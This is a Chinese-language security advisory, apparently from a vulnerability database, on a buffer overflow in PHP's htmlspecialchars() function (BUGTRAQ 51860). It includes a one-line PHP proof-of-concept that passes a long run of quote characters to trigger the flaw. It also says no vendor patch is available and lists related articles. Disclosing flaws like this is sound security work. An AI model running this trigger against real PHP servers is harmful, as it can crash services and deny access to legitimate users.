PHP “htmlspecialchars()”缓冲区溢出漏洞
发布日期:2012-02-03
更新日期:2012-02-06
受影响系统:
PHP PHP
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51860
PHP是一种在电脑上运行的脚本语言,主要用途是在于处理动态网页,包含了命令行运行接口或者产生图形用户界面程序。
PHP在带有$double=false的htmlspecialchars()函数的实现上存在缓冲区溢出漏洞,因为起始位置仅允许40个字节,攻击者可利用此漏洞在PHP进程中执行任意代码,使Web Server崩溃,拒绝服务合法用户。
<*来源:cataphract
链接:https://bugs.php.net/bug.php?id=60965
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
echo
htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""',
ENT_QUOTES, 'UTF-8', false), "\n";
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
相关文章
- Nginx NJS <0.3.4 存在缓冲区溢出漏洞
- Google Chrome <109.0.5414.74 存在基于堆的缓冲区溢出漏洞
- Modbus Slave缓冲区溢出漏洞CVE-2022-1068分析与复现
- XStream < 1.4.20 栈缓冲区溢出漏洞
- XStream < 1.4.20 栈缓冲区溢出漏洞
- Linux kernel 基于栈的缓冲区溢出漏洞
- QEMU <=7.1.0 存在整数溢出和缓冲区溢出漏洞
- Google Chrome <106.0.5249.119 存在缓冲区溢出漏洞
- Linux kernel NFSD 存在缓冲区溢出漏洞
- Sudo缓冲区溢出漏洞(CVE-2021-3156)修复